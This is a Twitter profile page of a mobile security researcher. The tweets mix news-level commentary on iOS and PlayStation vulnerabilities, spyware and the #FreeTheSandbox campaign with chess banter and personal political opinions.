Zuk (@ihackbanme)
Followers: 17K | Following: 10K | Media: 499 | Statuses: 10K
Mobile & Security Research | Founder @ZecOps (Acq. by JAMF) 🐊 & @ZIMPERIUM (Acq.) | #FreeTheSandbox✌ | ❤️ Chess | My random thoughts, only some are accurate.
Joined December 2009
I'm sure that @Apple will give bootrom exploits more thinking and understand that checkm8-style exploits will happen eventually. SOLUTION: avoid embarrassment by providing an option to unlock the boot (w/ pincode). Don't fight it and lose - #FreeTheSandbox and WIN!
So I’m telling @anishgiri what’s my Chess username (TheJourneyToIM) and Anish looks at my stats and says - you should have called it “I’m The Journey” 😂🤦♂️ w/ @rpragchess @Rameshchess
Google and Apple will soon realize that Checkm8-style bugs are inevitable. Sandbox restrictions against device owners don't make sense and only benefit attackers. Let people who purchased devices have full control and #FreeTheSandbox! Resistance is futile!
This dude found a kernel RCE on PS5 via the network (!!!). “Heartbleed”-like attack using an ancient bug from 2006. Disclosed via @Hacker0x01 to @Sony. This bug allows 3rd parties to clone games (!), cheat, or APTs to persist by compromising PS5/PS4. What did he get? $12.5k 🤦♂️.
Kudos to all ninjas @qwertyoruiopz @s1guza @axi0mX and everyone involved. Mad skills, real OG. #checkm8 #FreeTheSandbox #GAMEOVER
iOS on QEMU. Super cool project: With Checkm8, and this, there's no real need for 'research devices'. The only thing left is to #FreeTheSandbox on PAC enabled prod devices and we're set.
I can confirm that the WebKit bug is indeed a 0day, and iOS 14.6 is vulnerable. Worth updating to iOS 14.6 to avoid usage of kernel N-Days in the chain. This is yet another reminder that we need to have a local-admin on our phones. #FreeTheSandbox.
Translation: IF this is real, we're going to see some ransomware / malware in iOS spreading via 1-clicks very soon. If you haven't updated by now, it's a good reminder to do so. This should also remind @Apple that device-owners need a local administrator user (#FreeTheSandbox).
More and more bugs in iOS allow bypassing all mitigations and infecting devices remotely. The most secure OS? Maybe. Given the circumstances, I think we deserve to validate iPhones' integrity ourselves. #FreeTheSandbox.
@GretaThunberg @ClausHoumann You lost all respect when you blindly backed barbarian murderers and rapists in a conflict you knew nothing about. If you only focused on climate, it would’ve yielded a more positive impact on this planet… :( For the record: The sad “:(” is not for you, it’s for our planet.
@GMHikaru @LevitovChess @lachesisq Quite the opposite Hikaru. What he really means is that whoever drew with you, must be either Magnus or an engine :).
CVE-2018-8897 (POP SS CPU bug <3). POC + Write-up: Worse than Meltdown IMO but less coverage. Maybe because it doesn't have a cool name and logo ¯\_(ツ)_/¯ #YearOfCPUBugs
"if they cared about security, they (@Apple) would have allowed researchers to inspect their devices" - 100% correct! #FreeTheSandbox.
@FCE365 They really are just so afraid that someone will inspect FairPlay encryption at runtime, clear out their obfuscation and burn down their monopoly in flames, aren’t they? If they cared about security, they would allow researchers to inspect their devices.
@ValZudans @davidasinclair @PeterDiamandis Claiming “dark matter is a hoax” without presenting any explanation for the various issues that dark matter / energy theory tries to explain (missing mass, etc.) is an “interesting” take.
Looks like 0click attacks via Signal VOIP stack are happening in the wild. If the state of mobile wasn’t sad, it would have been ironically funny that folks get owned via Signal 😅. (My message to phone vendors is consistent: Open up phones for introspection asap!).
Here's a video of an unusual behavior I captured on my device Thursday last week. Note the number of "Signal Connection" (=verified) contacts I have never seen before, along with two VoIP call attempts.
Pretty cool bug! .1. Insane to see a known CVE from 2006 providing Remote kernel RW. 2. Only $12.5k ?? Not cool @Sony….
The PS4 (up to FW 11.00) and PS5 (up to FW 8.20) were vulnerable to CVE-2006-4304: I'll share details about successful exploitation at TyphoonCon.
@tim_cook Hi Tim, did you know that due to Sandbox restrictions you're *not allowed* to independently verify the integrity of your own Apple devices? This limitation helps attackers targeting iOS. We believe you understand it's a fundamental human right - please #FreeTheSandbox!
@ben_finegold @32gcfhkmm @GMHikaru Let me get this straight: A super GM, one of the best players currently, with ~2800 rating, defeated IMs/FMs and a CM in 45.5 out of 46 games on an online platform in 3min games, and anyone is really challenging that? What a waste of time and drama.
Wow, this went quite viral. ❤️ for everyone sharing the message and helping people to be a bit more secure. You can follow me (@ihackbanme) for more tweets about cyber security, entrepreneurship/startups, chess or other random thoughts.
@vxunderground Once they see the “switch to safe boot” instructions, which can only be done manually afaik, they will realize that the damage is actually bigger. Will take weeks to fix 🤦♂️🤦♂️🤦♂️
The most promising mitigation in the new iPhones already bypassed. It took many many man-years for @Arm to get PAC into iPhones. It took a week for @qwertyoruiopz to bypass. Brilliant.
@chamath @RobinhoodApp WAIT. You didn't value their integrity during their Seed, but you kept meeting them in their Series A AND Series B??? So what does it say about your integrity???
RIP @kevinmitnick. Thank you for everything. You were my childhood hero that became a friend. Thank you for everything. So many great memories. This is a picture from a lunch with @stevewoz after Defcon 2012. Kevin is in the mirror on the left side. We had a road trip from
@netanyahu “Just give the punches back” - do you think this is how a prime minister of Israel should talk? Shameful discourse :(
Now that iOS is becoming more than just 'mass-targeted', I have a small request. Dear @Apple, please allow device-owners to investigate their own device with RO FS access (provided correct PIN / face recognition). This will greatly benefit the platform's security. Best next step.
What was left out of is: The irony is anyone not on 12.3[.1] is now stuck, vulnerable to a highly reliable, cut/paste [10]0+day which exploit scavengers surely weaponize. AAPL draconian policy forbids update if < 12.4, so wait for 12.4.1. Way to go.
@Isaac_Herzog I just want to make sure we're on the same page: when you say harsh scenes, do you mean the scene in which the Minister of Defense was fired only because he did his job, wanted to warn of a danger, tried to convene the cabinet, was refused and was fired immediately afterwards? To be clear: the harsh scenes are first and foremost a personal political preference over the public good.
@ArjunMahadevan It didn’t happen by accident: I agree. Is it related to the CMO that joined one year ago? No way. Fact 1: 1 year ago Netflix market cap was almost double. Fact 2: the % of Netflix internet traffic didn’t change much compared to one year ago. Meaning: this entire thread is 🤷♂️.
[Important thread 1/N]: Let that sink in for a second: almost all respected publications were under espionage. All the sources of journalists were exposed. If you ever spoke to a journalist (even with "Signal"/"Whatsapp") you are exposed. THIS IS A MAJOR THREAT TO DEMOCRACY!
[BREAKING] 180+ journalists are confirmed targets of NSO's software including: FT, CNN, NY Times, WSJ, The Economist, AP, and Reuters. @ZecOps Mobile EDR is the only tool that ever caught NSO automatically. We are offering *free* inspection for journalists to help fight back.
5 publicly announced jailbreaks for iOS 12+. My guess is that there are about 50+ private groups with remote exploits for the latest iOS. Just a couple of months ago, many said that there wouldn't be any new JB on iOS.
iOS 12.0 - 12.1 Jailbreak List: Umang Raghuvanshi (iOS 12.0 - 12.1 Jailbreak); SorryMyBad (iOS 12.0 - 12.1 Jailbreak); KeenLab (iOS 12.0 - 12.1 Jailbreak); Qwertyoruiopz (iOS 12.0 - 12.1 Jailbreak); PanguTeam (iOS 12.0 - 12.1 Jailbreak).
@ty_johannes Brilliant. Can you check how many of the 100% games are well known theory/traps vs. complex games? If it's 100% in a complex game, it's weird. If it's a short 12-15 move game, it's possible at these (& even lower) levels.
Soon, the Sandbox will be free. Smart vendors will free the sandbox voluntarily because it's the right thing to do. Others? Well, we have a plan for that 🐊 #FreeTheSandbox cc: @chronic
For those that think that iOS is safe because of the "walled garden" take a look at the leaked Pegasus/NSO documents here. NSO couldn't care less about the "walled garden" because they infect devices without it: silently (0-click) or click on a link (aka 1-click).
See below, AND: do not use anything below iOS 10.3.3 due to reasons that I'll publish soon.
Friendly reminder: Do not use iOS devices on anything below 9.3.5 as a daily driver! Will soon drop a writeup about untetherHomeDepot/jailbreak.me, which will make it trivial to replace the jb payload with anything you want.
It’s mind blowing what brilliant people can do with the right access. @borrello_pietro developed PAC for X86 by patching Intel’s microcode!! This is pure genius. @borrello_pietro 👏👏.
@guyrightw @JoshBreiner If you don't see a problem here with a person who raises his hands and doesn't resist arrest getting beaten by police officers unnecessarily - then the problem is with you. Very sad.
Extremely thrilled to launch today. Thanks for everyone supporting this initiative. Together we will #FreeTheSandbox 👊.
Researching a compromised phone but not worried because it’s on airplane mode? Ha! Stealthy Cellular Access Under Fake Airplane Mode via @TheHackersNews. One more legitimate reason to enable #FreeTheSandbox.
@TarjeiJS Unpopular opinion: This is the *best* thing that happened to chess. Chess is finally getting a lot of attention, articles, and broadens the audience.
iOS 14.2 fixed three in the wild exploited vulnerabilities, but hey, there are also 100 new emojis! Updating is highly recommended.
Apple have fixed three issues reported by Project Zero that were being actively exploited in the wild. CVE-2020-27930 (RCE), CVE-2020-27950 (memory leak), and CVE-2020-27932 (kernel privilege escalation). The security bulletin is available here:
It was already clear to many. The lack of local admin rights, even on managed devices, is now officially a matter of national security. "iOS zero-day let SolarWinds hackers compromise fully updated iPhones". Reminder: It's time to #FreeTheSandbox.
iOS 14.5 came out with this option 👇. *seven* actively exploited zero-days were discovered in iOS in 2021 but we do not have "Allow Apps to access entire filesystem & memory" option. Priorities. Tell me more about how privacy is a fundamental human right. #FreeTheSandbox now!
I can easily imagine the following, totally made-up, conversation in Cupertino: IR Team at Apple: “We had at least 79.6 million compromised phones by this zero-click attack”. Marketing: “No no…. We can’t say that!!! On how many continents?” IR: “Seven. We even had an attack in.
Apple has notified people in 150 countries that they were infected with mercenary spyware (Intellexa, NSO…). We knew spyware was global but this is next level. The market has grown tremendously since 2004, when Hacking Team was getting started.
Some personal news. @ZIMPERIUM is getting acquired for $0.5b. Thanks to everyone who were part of this journey 🙏
My Keynote presentation from #HITB2021AMS "The State of Mobile Security" is now available here:
1. @A2nkF_ is a great 17yo researcher. 2. Now imagine what a group of skilled and financially motivated people can do over a period of 1-3 years. 3. Hopefully this exercise explains why vendors mustn't pose restrictions on researchers analyzing devices at scale.
17 yr. old Ilias (@A2nkF_), crushing macOS 🤯🤩
The SolarWinds attackers used a system path to plant the malware in stage 2 (e.g. C:\Windows). On smartphones we wouldn't be able to legitimately discover such attack due to sandbox restrictions on system folders 🤦♂️🤯. I'll wrap up with the obligatory #FreeTheSandbox 👊
@elonmusk @CommunityNotes You definitely need to bring back trust after the silly move to sell trust for $8 without an actual verification…
iOS 14.5 is out and (at least) CVE-2021-30661 was exploited in the wild. Reality called to remind us to #FreeTheSandbox 👊.
Dear Apple, once you let researchers help, the platform will be even more secure. Targeted folks (reporters, researchers, VIPs, anyone with access to sensitive data), CISOs, CIOs, would appreciate you even more. Be a thought leader. Just #FreeTheSandbox.